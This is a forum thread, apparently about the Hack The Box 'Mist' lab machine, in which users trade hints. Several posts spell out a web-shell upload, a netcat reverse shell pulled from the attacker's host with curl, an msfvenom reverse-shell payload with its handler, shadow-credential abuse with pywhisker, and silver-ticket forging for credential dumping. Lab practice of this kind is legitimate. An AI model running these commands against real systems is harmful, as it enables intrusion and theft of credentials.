[4ip0k]

After gaining a shell and becoming svc user .. What is the next step any hint ?

How you get the shell? you import the module but what shell you use and how I can bypass the av? because the shell kick me

Ok guys get a pownyshell from here : https://github.com/flozz/p0wny-shell/blo.../shell.php
After that go to http://mist.htb/data/modules .... And so on after y get shell.php click on it ok 
Now u have a shell .. U can forward it to ur kali .. Firstly download on kali nc64.exe after that set a web 
Server python -m http.server and from powny shell write curl http://kali ip:port/nc64.exe -o nc.exe
Now set nc -nlvp 4444 and  from powny shell write nc.exe kali ip 4444 -e cmd.exe now u have a shell on ur kali

---

So any hint after gaining the shell ?

After I gaining p0wnyshell , I add the curl command to download the nc64.exe and shell dies at the moment 
what other payload can I get to get shell as ms01\svc_web. Any shortcut?

Do not use nc in this step.

Prepare shell in msfvenom
exp: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe > shell.exe

After in p0wnyshell, load shell in C:\\xampp\\htdocs

Run on Kali msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST <IP>
run

Run shell through p0wnyshell and then the session will not fall off

[ipfi]

Not sure if it's a rabbit hole, but you can get ntlm hashes for svc_ca$ and svc_cabackup. Stuck here too

I got hash for svc_ca$. How did you get the hash for svc_cabackup?

https://github.com/ShutdownRepo/pywhisker.git

I've tried that with svc_ca$, op_sharon.mullard and other creds, but i always get:

Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

 python pywhisker.py -d "mist.htb" --dc-ip 192.168.100.100 -u 'svc_ca$' -H {SVC_CA$_HASH} --target "svc_cabackup" --action "add"

maybe a realy stupid question but I hope anyone can answer this for me..
how do you run python scripts through your shells?
Or do you ad routes to your attack machines to target 192.168.100.100?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[Test12349]

Yes, use autoroute in MSF + socks proxy + proxychains.

Is anyone able to access the machine now on any VPN?

[KillerWhale]

Yes, use autoroute in MSF + socks proxy + proxychains.

Is anyone able to access the machine now on any VPN?

No, I've been waiting the whole day but nothing works.

[DoesntMatter123456]

Same here! Unable to access machine for the last 6 hours :|

[KillerWhale]

I'm trying to get the cert so I can get TGT -> ST, but I can only get private key, and I can't create the pfx.
Any hit please?
Maybe I'm using the wrong tool?

How can you connect to the machine? We haven't been able to connect to the machine for many hours.

[mazafaka555]

ping works the rest is dead..

can somebody explain how to properly getST and then dump hashes please?
used getST and tried to use ticketer.py . but then i can't access shares on ms01 or dump with secretsdump.py

maybe spn is wrong ?
proxychains python3 examples/ticketer.py -nthash '4a74........e6d833' -domain-sid S-1-5-21-1075431363-3458046882-2723919965 -domain MIST.HTB -spn ldap/DC01.mist.htb MS01$

also tried -spn cifs/DC01.mist.htb
secretdumps simply hangs.

Instead how can we use Rubeus to get Silver Ticket and then dump creds ? stuck

[laranja]

statement now issued by the HTB platform:

 We are aware of an issue preventing users from accessing the service on port 80 on Mist. The issue has been identified, and we are preparing and distributing a fix now, and will update when it is complete.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[KillerWhale]

It's working again, let's go boys & girls, let's break the TGT wall in front of us!

Which VPN server does it work?

[mazafaka555]

It's working again, let's go boys & girls, let's break the TGT wall in front of us!

doesn't work for me :/